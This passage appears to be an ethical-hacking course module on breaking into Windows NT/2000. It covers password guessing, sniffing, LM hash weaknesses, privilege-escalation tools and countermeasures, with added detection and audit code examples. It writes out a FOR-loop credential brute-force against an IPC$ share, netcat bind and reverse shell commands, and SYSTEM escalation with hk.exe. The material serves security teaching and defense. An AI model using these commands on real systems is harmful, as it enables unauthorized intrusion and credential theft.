Module Objectives


In the preceding modules we have explored the reconnaissance phase, the scanning phase and the enumeration phase. We have noted the progressive intrusion that an attacker makes towards his target system(s). In this module we will explore the various means with which an attacker penetrates the system. Readers should bear in mind that this does not indicate a culmination of the attack. In the following modules we will be exploring certain means and methods of attack in greater detail.

On completion of this module, the reader will be familiar with:

  • aspects of remote password guessing,

  • role of eavesdropping,

  • overview of denial of service (covered in detail in module 8),

  • buffer overflows (covered in detail in module 20),

  • implications of privilege escalation,

  • various methods of password cracking,

  • role of keystroke loggers,

  • use of sniffers (covered in detail in module 7),

  • deployment of remote control and backdoors (covered in detail in module 6),

  • redirection of ports,

  • methods used by attackers to cover their tracks on the target system and

  • how they use the compromised system to hide sensitive information files.

start sidebar
Administrator Password Guessing
  • Assuming that the NetBIOS session port (TCP 139) is open, the most effective method of breaking into NT/2000 is password guessing.

  • Attempt to connect to an enumerated share (IPC$ or C$), trying username/password pairs.

  • The default Admin$, C$ and %Systemdrive% shares are a good starting point.

end sidebar
 

We discussed the reconnaissance phase, in which an attacker tries to gain as much information as possible about a target system. The more information an attacker has, the greater his chances of success in a password attack.

The starting point can be as simple as searching the company's web site for user names and system hardware. It can later expand to include social engineering and dumpster diving. There is a possibility that the attacker may get a password with these attacks, but more often, he is likely to get information about the company and employee names that will help in future password guessing.

Note  

We pointed out in the previous module that null sessions conducted during enumeration are counted among the first signs of intrusion that an attacker makes on the target system. Logically, this also forms the basis for further probing by the attacker. He will try to enumerate shares and attempt to guess passwords to gain access to them. With tools such as userinfo.exe, enum and sid (seen in the last module), he can narrow his attempts to selected usernames and likely passwords.

Threat  

One common security lapse is to leave the built-in Administrator account with a blank password. Password guessing appeals to the attacker because complicated passwords are difficult to remember, so users tend to choose the easiest password possible. Users often pick something easy to remember such as a birthday or the name of a pet or child. Lists of such common username/password combinations can be downloaded all over the Internet.

Attack Methods  

One can categorize password guessing attacks by the amount of interaction they require with the authentication system. They are on-line attacks when the perpetrator must use the authentication system itself to check each password guess. In off-line attacks the attacker first obtains information (e.g. a password hash) that lets him check guesses on his own, without any further access to the system. On-line attacks are generally much slower than off-line ones, since every guess costs a network round trip and may be throttled, logged or locked out by the target.

start sidebar
Performing automated password guessing
  • Automated password guessing is easy: a simple loop using the NT/2000 shell FOR command around the standard NET USE syntax.

    1. Create a simple username and password file (one "username password" pair per line).

    2. Feed this file to the FOR command (%i is the username, %j the password):

       C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %j /u:%i
end sidebar
 
Note  

If the attacker fails in a manual attack, he can choose to automate the process. Several free programs can assist him: Legion and the NetBIOS Auditing Tool (NAT) automate on-line share and password guessing, while John the Ripper and L0phtCrack (LC4) work off-line on captured password hashes (discussed later in this module).

The simplest automation method takes advantage of the net command, wrapped in a loop using the NT/2000 shell FOR command. All the attacker has to do is create a simple username and password file, one pair per line, and feed it to FOR. With "tokens=1,2*", %i receives the username and %j the password, so the password goes first on the net use line and the username after /u:

 C:\> FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %j /u:%i
Attack Methods  

Automated password attacks can be divided into two basic categories, dictionary attacks and brute force attacks.

  • A simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against the user accounts located by the application. The larger the selection of words and word fragments, the more effective the dictionary attack is.

  • The brute force method is the most inclusive, though slow. It tries every possible combination of letters, numbers and symbols from a chosen character set, up to a chosen length.

  • A hybrid approach combines features of both methods. It usually starts with a dictionary and then tries variations such as two words joined together, or a word followed by numbers.

start sidebar
Tool: Legion
  • Legion automates the password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.

end sidebar
 
Tools  

Legion automates the locating and connecting of Windows-based shares. The software depends on the user not protecting their shares with passwords before connecting to the Internet. The software also has a brute-force password cracking plug-in that can be used to find passwords for shares that are protected (Commercial version).

Other software that bears functional similarity with Legion includes SMBscanner, Cerberus Information Security's scanner, NBTdump, Cain 2.0 / Cain & Abel, the GNIT NT Vulnerability Scanner and Share Finder. On UNIX the analogous exposure is NFS exports, and on the Macintosh platform Web sharing or AppleShare/IP.

The protocol exploited is NetBIOS (Network Basic Input/Output System), an API that allows applications on different computers to communicate within a local area network. NetBIOS is used over Ethernet, token ring and Windows NT networks.

Legion polls a wide range of IP addresses to check for shared folders. The application broadcasts a NetBIOS request across the LAN to find all computers offering NetBIOS services, then searches each polled computer for available shares and displays the results. Once these shares are known, an administrator has little means of detecting or deterring brute-force password guessing against them. The commercial version of Legion has an option to brute-force any shares that were found to be password protected. The vulnerable system can have its drive mapped to the attacker's system, and he can use this point of access for further nefarious activities such as installing Trojans, stealing information and even corrupting the system, thereby causing a denial of service. The most obvious countermeasure is to make sure that File and Print Sharing is disabled. If it is required, it must be password protected and allowed only from specific IP addresses, because DNS names can be spoofed. The system must also restrict null sessions.

start sidebar
Hacking tool: NTInfoScan (now CIS)
  • NTInfoScan is a vulnerability scanner for NT 4.0 that produces an HTML based report of the security issues found on the target system, with further information on each.

end sidebar
 
Tools  

NTInfoScan (now the Cerberus Internet Scanner, CIS) is a vulnerability scanner designed by David Litchfield specifically to address the security concerns of the Windows NT 4.0 operating system. It still works with Windows 2000. The HTML based report highlights the security issues found on the target system along with further information. NTInfoScan is currently at version 5. It tests a number of services, such as ftp, telnet and the web service, for security problems. In addition, NTInfoScan checks NetBIOS share security and user account security. While this tool helps secure default Windows installations, it can be used for malicious purposes too; this holds for many security tools, because it is left to the user to decide what he wants to achieve with a particular tool. Here, an attacker can find out more about a target system: services running, software banners, exploitable vulnerabilities, user information, shares available and so on.


The above screenshot displays the depth of information the tool can deliver. Incidentally, the target system was running UNIX and CIS could pick out vulnerabilities and the nature of attack possible on the system.

start sidebar
Password guessing Countermeasures
  • Block access to TCP and UDP ports 135-139.

  • Disable bindings to the WINS client on any adapter.

  • Use complex passwords.

  • Log failed logon attempts in Event Viewer: Security log, Logon/Logoff category, event 529 (bad user name or password) or 539 (account locked out).

end sidebar
 
Countermeasure  

The first countermeasure against password guessing should rightly close the ports used by the NetBIOS protocol, namely TCP and UDP ports 135-139, to unauthorized access, and disable bindings to the WINS client on any adapter. Apart from what the administrator can do, users need to be made aware of their contribution to the situation. Users can thwart password guessing to a great extent by choosing complex passwords that mix letters, numerals and symbols.

However, the prime deterrent to choosing complex passwords is that they are often hard to remember, and users obviously do not want to be locked out of their own systems. A good practice is to take the first letter of every word in a phrase, such as 'Serena Williams holds four Grand Slam titles', giving the password 'SWhfGSt'. Windows can enforce the choice of complex passwords through the password policy. Users must be made to change their passwords at regular intervals, or as often as they choose within an interval.

Countermeasure  

Network and Web server logs can hold the trace evidence of computer system attacks. Server log entries can reveal whether systems have been attacked, how they were attacked, and whether the attacks were successful. The purpose of log analysis is to look for unusual events on the network and patterns of abnormal behavior such as unauthorized logins, unusually long log entries and repeated unsuccessful attempts to access systems. Take special note of failed logon attempts, recorded in the Security log as events 529 (bad user name or password) and 539 (account locked out), and of logging patterns that fall outside the ordinary for regular users, such as many failures against one account from a single workstation within a short time.

There are many log-analysis tools available that report network events, ranging from commercial products such as Event Reporter to free programs such as Backlog and NT Syslog. Moreover, log-parsing programs such as Logsurfer, Swatch, and several application-specific tools monitor system logs for attack signatures.
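The detection the two countermeasure paragraphs above describe, as an added example (not code from the page or from any of the tools it names): it parses a few constructed Security-log records, tracks 529 failures per (workstation, account) in a sliding window and raises an alert when guessing is likely, treating a 539 lockout as confirmation. The record format assumed here is a simple CSV export (time, event id, account, workstation); a real Event Viewer export has more fields, and the sample lines are made up for the demo.

```python
"""Flag password-guessing patterns in Windows NT/2000 Security log events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: time, event id, target account, source workstation.
# 528 = successful logon, 529 = bad user name or password, 539 = account locked out.
SAMPLE_LOG = """\
2003-05-12 09:14:01,528,jsmith,WS-ACCTS
2003-05-12 09:15:10,529,administrator,WS-LAB7
2003-05-12 09:15:11,529,administrator,WS-LAB7
2003-05-12 09:15:11,529,administrator,WS-LAB7
2003-05-12 09:15:12,529,administrator,WS-LAB7
2003-05-12 09:15:12,529,administrator,WS-LAB7
2003-05-12 09:15:13,529,administrator,WS-LAB7
2003-05-12 09:30:00,529,jsmith,WS-ACCTS
2003-05-12 10:42:07,539,bkumar,WS-LAB7
2003-05-12 11:00:00,528,administrator,WS-MGMT
"""

FAILURE_EVENTS = {529: "bad user name or password", 539: "account locked out"}


def parse_events(text):
    """Turn the CSV export into (timestamp, event_id, account, workstation) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, user, ws = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       int(eid), user.lower(), ws))
    return events


def detect_guessing(events, threshold=5, window=timedelta(minutes=1)):
    """Return alerts keyed by (workstation, account).

    An alert is raised when `threshold` or more 529 failures against the same
    account come from one workstation inside `window`, or when a 539 appears,
    which means guessing has already tripped the lockout policy.
    """
    failures = defaultdict(list)   # (workstation, account) -> recent failure times
    alerts = {}
    for ts, eid, user, ws in sorted(events):
        key = (ws, user)
        if eid == 539:
            alerts[key] = "lockout (%s)" % FAILURE_EVENTS[539]
            continue
        if eid != 529:
            continue
        bucket = failures[key]
        bucket.append(ts)
        # drop failures that have fallen out of the sliding window
        while bucket and ts - bucket[0] > window:
            bucket.pop(0)
        if len(bucket) >= threshold and key not in alerts:
            alerts[key] = "%d failures in %ds" % (len(bucket), window.seconds)
    return alerts


if __name__ == "__main__":
    for key, reason in detect_guessing(parse_events(SAMPLE_LOG)).items():
        print("workstation %s -> account %s: %s" % (key[0], key[1], reason))
```

The single jsmith failure is ignored as ordinary user error; the burst against administrator from WS-LAB7 and the lockout of bkumar from the same machine are both reported, which is exactly the pattern the FOR-loop attack earlier in this module leaves behind.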

start sidebar
Monitoring Event Viewer Logs
  • Logging is of no use if no one ever analyzes the logs

  • VisualLast from www.foundstone.com formats the event logs visually

end sidebar
 

We have seen password countermeasures; now let us look at some of the tools. One tool assisting network administrators is VisualLast from Foundstone. VisualLast gives a network administrator insight into the event logs so that the activity of a distributed network can be assessed more accurately and efficiently.

Tools  

VisualLast is considered the advanced version of NTLast, with a number of additional and more sophisticated features. The program is designed to let network administrators view and report individual users' logon and logoff times, and these events can be searched by time frame. This is an invaluable feature for security analysts looking for intrusion details.

The program is visually intuitive and the software is multithreaded so that the interface remains responsive while scanning events. This does not lock out the user while waiting for long searches to complete. Scan settings can be saved to a file and dragged/dropped from explorer directly onto VisualLast to help automate the work.

In addition, multiple splitter bars may be used to arrange columns to personal taste, which greatly aids examining long lists. Detailed findings can be printed in tabular form, and CSV export is available so that the user can import his findings into Microsoft Excel for further analysis. Any network administrator can thus quickly test for intrusion and save the work for documentation.

To add to its functionality, VisualLast can distinguish between local console logons and remote network logons and can even filter and display Microsoft Internet Information Server (IIS) logons.

start sidebar
Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

end sidebar
 
Attack Methods  

If password guessing is not possible, the attacker can try to obtain credentials by sniffing instead. Password sniffing is popular on local area networks because a passive sniffer generates no traffic of its own, which makes it hard to detect and far stealthier than guessing.

Concept  

On a shared-medium network (a hub-based Ethernet segment, for instance) every frame sent by any computer reaches every other computer on the segment. Normally a computer discards frames whose destination MAC address does not match its own, so all computers except the intended recipient ignore the message. However, a system running a sniffer puts its interface into promiscuous mode and examines every frame that traverses the segment, looking for passwords and other sensitive information. For instance, if a user logs in to a computer across the network and the attacker's system is running a sniffer, the attacker can capture the login information, i.e. the user name and its corresponding password. This makes it easy for the attacker to log in to the target system as an authentic user and compromise it further. This technique is called password sniffing. (On a switched network the attacker does not see other hosts' traffic by default and has to resort to tricks such as ARP spoofing; these are covered with sniffers in module 7.)

This is a serious threat to users, such as remote users, who log in to computers from remote sites. The password security of a remote user is therefore only as good as the network he or she uses to reach the remote computer.

Countermeasure  

Apart from encrypting the authentication exchange (secure password authentication), one way to defend against password sniffing is to use one-time passwords. A one-time password is a password which is good for only one use, so a captured value cannot be replayed. Encryption is, however, advocated as the more reliable countermeasure.
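To make the one-time-password countermeasure concrete, here is an added example (not from the page and not any vendor's implementation) of a Lamport-style hash-chain OTP, the scheme behind S/KEY. The server stores only the last accepted value; each login must present the value one step earlier in the chain, which the attacker cannot compute from what he sniffed, and a replay of a used value fails. The chain hash (SHA-256), seed and chain length are assumptions made for the demo.

```python
"""Hash-chain one-time passwords: a sniffed password cannot be replayed."""
import hashlib


def h(value: bytes) -> bytes:
    return hashlib.sha256(value).digest()


def make_chain(seed: bytes, n: int) -> list:
    """chain[i] = h^i(seed). The client keeps the chain; the server keeps chain[n] only."""
    chain = [seed]
    for _ in range(n):
        chain.append(h(chain[-1]))
    return chain


class OtpServer:
    def __init__(self, final: bytes):
        self.current = final          # h^n(seed): the only secret stored server-side

    def login(self, otp: bytes) -> bool:
        # Accept only the immediate predecessor of the stored value ...
        if h(otp) == self.current:
            self.current = otp        # ... then move back one step, so this otp never verifies again
            return True
        return False


class OtpClient:
    def __init__(self, chain):
        self.chain = chain
        self.next_index = len(chain) - 2   # chain[n-1] is the first password to present

    def next_password(self) -> bytes:
        otp = self.chain[self.next_index]
        self.next_index -= 1
        return otp


def demo():
    """Returns (legitimate login, attacker's replay, next legitimate login)."""
    chain = make_chain(b"constructed-seed", 10)     # constructed seed, 10-step chain
    server, client = OtpServer(chain[-1]), OtpClient(chain)
    sniffed = client.next_password()   # attacker captures this value on the wire
    first = server.login(sniffed)      # legitimate use succeeds
    replay = server.login(sniffed)     # replayed value is rejected
    second = server.login(client.next_password())
    return first, replay, second


if __name__ == "__main__":
    print(demo())   # (True, False, True)
```

Note what the server holds: a hash of the next valid password, never the password itself, so a copy of the server's table is as useless to the attacker as the sniffed value. When the chain is exhausted the client has to be re-seeded, which is the main operational cost of the scheme.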

start sidebar
Hacking Tool: L0phtCrack
  • LC4 is a password auditing and recovery package distributed by @stake. Its SMB packet capture listens on the local network segment and captures individual login sessions.

  • With the L0phtCrack password cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator status in a matter of days.

end sidebar
 
Tools  

L0phtCrack was developed in the mid 90s by L0pht Heavy Industries to reveal the security flaws inherent in the Windows password authentication system. Later, @stake acquired the rights to the software and currently offers it as LC4. LC4 is available for a 15-day trial period with the brute-force capability disabled. In module four we saw the Windows authentication system; a brief recap is given here to understand the attack carried out by L0phtCrack / LC4.

Concept  

Windows operating systems based on the LAN Manager networking protocols use an authentication system in which the client never sends the password itself: the server issues a challenge, and the client returns a twenty-four byte response computed from the challenge and the hash of its password. The server computes the same response from the hash stored in its database; a match results in authentication. The problem lay in the weak hash algorithm and the conversion of the password to uppercase before hashing (which eliminates case sensitivity). The algorithm padded the password to fourteen characters, split it into two seven-character segments and hashed them individually. An attacker therefore never has to crack more than seven characters at a time, and a second segment that is empty reveals that the password is shorter than eight characters. The weakness of the password hash, coupled with the transmission of the challenge/response pair across the network, made LM-based systems highly susceptible to password interception and brute-force attack by L0phtCrack.

Threat  

Windows NT introduced case sensitivity to strengthen the password, but coupling LM authentication with the NTLM scheme for backward compatibility with LAN Manager-based systems meant that both responses were sent across the network and both hashes were stored in the password database. L0phtCrack therefore captures and cracks the much simpler LM password first, then applies the result to the NTLM hash, needing only to try the case variations of the recovered string.

Note  

NT Service Pack 4 offered system administrators the option to modify or remove the LM response from the challenge/response transmission by setting the LMCompatibilityLevel value in the system registry. LMCompatibilityLevel ranges from 0 to 5. The lower levels allow both NT and LM-based systems to coexist; the higher levels completely remove backward compatibility for LM-based machines.

It also offered the option of 56-bit or 128-bit session security for both LM and NTLM challenge/response exchanges. These LMv2 and NTLMv2 responses are considerably stronger and, although LC4 can still capture them from the network, they are essentially immune to its dictionary or brute-force attacks. With the advent of Windows 2000/XP, Kerberos was introduced as the primary authentication method. Kerberos sends 56-bit or 128-bit encrypted session keys across the network rather than the password hashes themselves; this is detailed in module four. Where Kerberos is used, no NTLM challenge/response pairs cross the network, so LC4's SMB sniffer captures nothing. Note, however, that Windows 2000 silently falls back to NTLM whenever Kerberos cannot be used (for example when a server is addressed by IP address or is not a domain member), and in a heterogeneous network with NT and/or LM-based machines the sniffer can capture that traffic.
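The structural weakness described in the Concept and Threat paragraphs above, as an added example (not code from the page and not L0phtCrack's code): it reproduces the LM layout (uppercase, pad to 14 bytes, split into two 7-byte halves, hash each half on its own) and then attacks each half independently, dictionary first and a short brute force after, exactly the order LC4 works in. Assumption: a truncated SHA-256 stands in for LM's DES step, so the values are not real LM hashes, but the attack strategy and the length leak are the same. The wordlist and sample passwords are constructed for the demo.

```python
"""Why the LAN Manager hash cracks so easily: each 7-byte half is attacked alone."""
import hashlib
import itertools
import string

HALF = 7
ALPHABET = string.ascii_uppercase + string.digits   # LM has already uppercased everything


def _block_hash(block: bytes) -> str:
    # Stand-in (assumption) for "DES-encrypt the constant KGS!@#$% under this 7-byte key".
    assert len(block) == HALF
    return hashlib.sha256(block).hexdigest()[:16]


# An all-null half always hashes to the same value. Real LM has the same
# property (the well-known constant AAD3B435B51404EE), which leaks that the
# password is shorter than eight characters.
EMPTY_HALF = _block_hash(b"\x00" * HALF)


def _halves(password: str):
    padded = password.upper().encode("ascii", "replace")[:2 * HALF].ljust(2 * HALF, b"\x00")
    return padded[:HALF], padded[HALF:]


def lm_style_hash(password: str):
    left, right = _halves(password)
    return _block_hash(left), _block_hash(right)


def shorter_than_eight(h) -> bool:
    """Free information for the attacker before any cracking starts."""
    return h[1] == EMPTY_HALF


def crack_half(target: str, wordlist, max_brute_len: int = 2):
    """Recover one half: wordlist first, then brute force up to max_brute_len chars.

    Returns (plaintext or None, attempts). Because each half is independent, a
    14-character password costs two 7-character searches, not one 14-character
    search.
    """
    attempts = 0
    if target == EMPTY_HALF:
        return "", attempts
    for word in wordlist:
        attempts += 1
        left, _ = _halves(word)          # first 7 chars of the word, uppercased, padded
        if _block_hash(left) == target:
            return left.rstrip(b"\x00").decode(), attempts
    for n in range(1, max_brute_len + 1):
        for combo in itertools.product(ALPHABET, repeat=n):
            attempts += 1
            block = "".join(combo).encode().ljust(HALF, b"\x00")
            if _block_hash(block) == target:
                return "".join(combo), attempts
    return None, attempts


def crack_lm_style(h, wordlist, max_brute_len: int = 2):
    """Returns (recovered uppercase password or None, total attempts)."""
    left, a1 = crack_half(h[0], wordlist, max_brute_len)
    right, a2 = crack_half(h[1], wordlist, max_brute_len)
    if left is None or right is None:
        return None, a1 + a2
    return left + right, a1 + a2


WORDLIST = ["secret", "letmein", "summer2003", "password", "welcome"]   # constructed

if __name__ == "__main__":
    h = lm_style_hash("Password1")
    print("shorter than 8 chars:", shorter_than_eight(h))
    print(crack_lm_style(h, WORDLIST))   # ('PASSWORD1', 181): case is lost, as the text says
```

"Password1" is nine characters with mixed case and a digit, yet it falls in a few hundred hash operations: the first half is a dictionary word truncated to seven characters, and the leftover "D1" is a two-character brute force. The case of the original is gone; as the Threat paragraph explains, the NT hash is then consulted only to settle which letters were upper case.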


The above screenshot shows LC4's password audit wizard where one can specify the type of password cracking to be adopted and the audit methodology.

start sidebar
Hacking Tool: KerbCrack
  • KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

end sidebar
 
Tools  

KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute force attack or a dictionary attack.

Note  

Internet Explorer 5.0 and later versions support Kerberos authentication by way of a Negotiate WWW-Authenticate header that is sent by IIS paired with the classic NTLM WWW-Authenticate header. In effect, Internet Explorer sends both NTLM and Kerberos authorization data back to IIS, allowing it to pick the one it prefers to use. KerbCrack highlights the need to use IPSec in conjunction with Kerberos.

KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. We had seen in our discussion on LC4 how Kerberos was introduced as a means to secure passwords. Let us explore how this can also be vulnerable to brute force attacks.

In general, encryption protocols such as Kerberos can be circumvented under the following four scenarios:

  • The attacker is able to steal the encryption key, by any means possible.

  • The attacker finds a flaw in the implementation of the protocol, attributable to the vendor.

  • The attacker finds a flaw in the protocol itself, which is highly unlikely.

  • The attacker tries all possible keys in a brute-force approach. This is a possibility.

This is the approach that Arne Vidstrom's KerbCrack adopts. The important caveat is that the key protecting the initial Kerberos exchange is derived from the user's password, so KerbCrack does not have to enumerate the raw key space at all: it derives a key from each candidate password and checks whether it decrypts the captured pre-authentication data. Searching the entire key space would indeed take an infeasibly long time, but a user who has chosen a dictionary word has reduced that search to minutes, whatever the key length.

start sidebar
Privilege Escalation
  • If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

  • This is called privilege escalation

end sidebar
 
Concept  

Once an intruder has access to a remote system with a valid username and password, he will attempt to increase his privileges by escalating from the account in use to one with greater privileges, such as an administrator's. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to those of SYSTEM, launching a listener with "nc.exe -l -p 50000 -d -e cmd.exe" so that the resulting shell runs as SYSTEM. Note that this can also be used remotely.

The degree of escalation depends on which privileges the attacker already holds and which can be obtained in a successful attack. The best countermeasure is to ensure that users have the least possible privileges, i.e. just enough to use their systems effectively. It is often a flaw in program code that allows such escalation of privileges.

For instance, the named pipe prediction flaw in Windows 2000 allows interactively logged-on users to impersonate the SYSTEM account and execute arbitrary programs with its privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can predict the name of the next named pipe and create a pipe of that name before the Service Control Manager (SCM) does. When a new service is started it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs under a highly privileged account (such as ClipBook, which runs as SYSTEM), the attacker gets the SCM to connect that service to his pipe and can impersonate it. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrators group, and the attacker completes his privilege escalation by logging out and logging in again.

Countermeasure  

General privilege escalation countermeasures include restricting interactive logons and access to systems programs that users do not require such as cmd.exe, auditing account logon events success, failure; privilege use success, failure and system events success, failure.

start sidebar
Tool: GetAdmin
  • GetAdmin.exe is a small program that adds a user to the local administrators group.

  • It uses low-level NT kernel routine to set a globalflag allowing access to any running process.

  • You need to logon to the server console to execute the program.

  • The GetAdmin.exe is run from the command line or from a browser.

  • This only works with NT 4.0 up to Service Pack 3.

end sidebar
 
Tools  

GetAdmin is one tool that gained popularity as a privilege escalation tool. On a Windows NT machine, GetAdmin allows a user to attach to any process running on the system, including any process running in the system's security context, such as WinLogon. This is made possible because the tool exploits a vulnerability in a low-level kernel routine that causes a global flag to be set. This allows function calls to NtOpenProcessToken to succeed regardless of the current user's permissions. Once the process is attached, a thread can be started in the security context of the process.

Attack Methods  

On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that add the specified user to the Administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the "Debug Programs" right will always be able to run the program successfully, because that right allows a user to attach to any process. The "Debug Programs" right is initially granted only to Administrators and should only ever be granted to fully trusted users.

Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.

start sidebar
Tool: hk.exe

The hk.exe utility exposes a Local Procedure Call flaw in NT.

  • A non-admin user can be escalated to administrators group using hk.exe

     C:\>net localgroup administrators peter /add
     Access Denied
     ------------------------------------------------
     c:\>hk net localgroup administrators peter /add
     lsass pid & tid are: 47 - 48
     NtImpersonateClientOfPort succeeded
end sidebar
 
Note  

Before we begin our discussion of this tool, let us look at a few terms. A thread is a unit of execution within a process. A token is a security attribute that defines the security context (user, groups and privileges) a thread runs with.

Tools  

As seen in the discussion of privilege escalation, hk.exe takes advantage of a vulnerability in the NtImpersonateClientOfPort API call and allows the user to obtain the token of a kernel-mode LPC server thread (LSASS or equivalent). The tool is a command line executable; the user simply keys in hk followed by any command he would want to run if he had NT AUTHORITY\SYSTEM privileges. Note that this is above the privileges of the Administrator account.

 nc -l -p 23                              (attacker's machine: listen for the shell)
 nc -d -e cmd.exe 192.168.xx.xx 23        (done on the active netcat running on the webserver)
 hk2 nc -d -e cmd.exe 192.168.xx.xx 23
 lsass pid & tid are: 50 - 53

The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients . Instead, it uses the original handle it got from the NtCreatePort call.

The kernel identifies the client by using the pid, tid and mid from the message. Though Microsoft has issued a patch for NT, and a new API, NtSecureConnectPort, on W2K allows a client to verify that the port's server is running with a particular SID, this tool is still seen in the wild.

start sidebar
Manual Password Cracking Algorithm
  • Find a valid user

  • Create a list of possible passwords

  • Rank the passwords from high probability to low

  • Key in each password

  • If the system allows you in - Success

  • Else try till success

end sidebar
 
Note  

In its simplest form, password guessing can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated by the FOR loop.

A text file is created to serve as a dictionary from which the FOR loop draws a username (%i) and password (%j) from each line as it iterates:

 [file: credentials.txt]
 administrator ""
 administrator password
 administrator administrator
 [Etc.]

From a directory that can access the text file the following command is typed (the "More?" prompts are the shell asking for the continuation lines):

 c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
 More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
 More? 2>>nul^
 More? && echo %time% %date% >> outfile.txt^
 More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
 c:\>type outfile.txt
Threat  

If a username and password from credentials.txt was guessed successfully, outfile.txt will exist and contain the correct user name and password (net use only succeeds, and so only reaches the echo commands, when the credentials are accepted). The attacker's system will also hold an open session with the victim server.

start sidebar
Automatic Password Cracking Algorithm
  • Find a valid user

  • Find encryption algorithm used

  • Obtain encrypted passwords

  • Create list of possible passwords

  • Encrypt each word

  • See if there is a match for each user ID

  • Repeat steps 1 through 6

end sidebar
 
Note  

As security awareness increased, most systems began running passwords through an algorithm to generate a hash before storing them. This hash is much more than a rearrangement of the original password: it is a one-way hash, a fixed-length string of characters from which the original text cannot be recovered.

Threat  

However, the vulnerability does not arise from the hashing process but from the storage. Systems do not "decrypt" the stored password during authentication; they store only the one-way hash. During login, the password entered is run through the algorithm, and the resulting hash is compared to the one stored on the system. If they are the same, the proper password is assumed to have been supplied. Therefore all an attacker has to do in order to crack a password is to get a copy of the one-way hash stored on the server and run candidate passwords through the same algorithm until he gets a match. Most systems (Microsoft, UNIX and Netware) have publicly documented their hashing algorithms, so the attacker has no trouble reproducing them.

Attack Methods  

However secure this appears, attackers can combine attack methods to reduce the time involved in cracking a password. This is where automated password crackers come into action. Freeware password crackers are available on the Internet for NT, Netware and UNIX, and ready-made password lists can be fed to them to carry out a dictionary attack.

At its simplest, automation involves finding a valid user, identifying the hashing algorithm in use, obtaining the hashed passwords, creating a list of candidate passwords, hashing each candidate and checking for a match against each known user ID. This process is repeated until the desired results are obtained or all candidates are exhausted.

start sidebar
Password Types
  • Passwords that contain only letters.

  • Passwords that contain only numbers.

  • Passwords that contain only special characters.

  • Passwords that contain letters and numbers.

  • Passwords that contain only letters and special characters.

  • Passwords that contain only special characters and numbers.

  • Passwords that contain letters, special characters and numbers.

end sidebar
 
Note  

Passwords can be categorized into various types based on their composition. Let us take a look at these types to enhance our understanding of password cracking.

  • Passwords that contain only letters: As the name implies, these contain only alphabetic characters and are the easiest to crack. Example: "secret"

  • Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"

  • Passwords that contain only special characters: These passwords consist solely of special characters and are easier to crack the shorter they are. Example: "*%$%@"

  • Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Example: "a3rf5"

  • Passwords that contain only letters and special characters, and passwords that contain only special characters and numbers, are quite similar to the preceding type. Examples: "df%g$i", "39*&4"

  • Passwords that contain letters, special characters and numbers are considered the most secure, as the combination can be difficult to crack. Given an appropriate length they can be considered safe, and if encrypted well, safe on the network as well. Example: "a#d5y8%"
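The categories above can be turned into a small audit routine. The Go program below is an added example and not part of the module; the function names classify and keyspace and the character-class sizes it assumes (26 lower-case letters, 26 upper-case, 10 digits, 33 specials) are choices of this example. It classifies each of the sample passwords above and computes how many candidates an exhaustive cracker must try for that length and character mix, which is what makes the mixed-class passwords harder.

```go
package main

import (
	"fmt"
	"math/big"
	"unicode"
)

// Sizes of the character classes assumed by this example (printable ASCII).
const (
	lowerSize   = 26
	upperSize   = 26
	digitSize   = 10
	specialSize = 33 // 32 punctuation characters plus the space
)

// classify names the composition category used in the text: which of
// letters, numbers and special characters the password contains.
func classify(password string) string {
	var letters, numbers, specials bool
	for _, r := range password {
		switch {
		case unicode.IsLetter(r):
			letters = true
		case unicode.IsDigit(r):
			numbers = true
		default:
			specials = true
		}
	}
	switch {
	case letters && !numbers && !specials:
		return "letters only"
	case !letters && numbers && !specials:
		return "numbers only"
	case !letters && !numbers && specials:
		return "special characters only"
	case letters && numbers && !specials:
		return "letters and numbers"
	case letters && !numbers && specials:
		return "letters and special characters"
	case !letters && numbers && specials:
		return "special characters and numbers"
	case letters && numbers && specials:
		return "letters, special characters and numbers"
	}
	return "empty"
}

// keyspace returns the number of candidates an exhaustive (brute force)
// cracker must try for a password of this length drawn from the classes it
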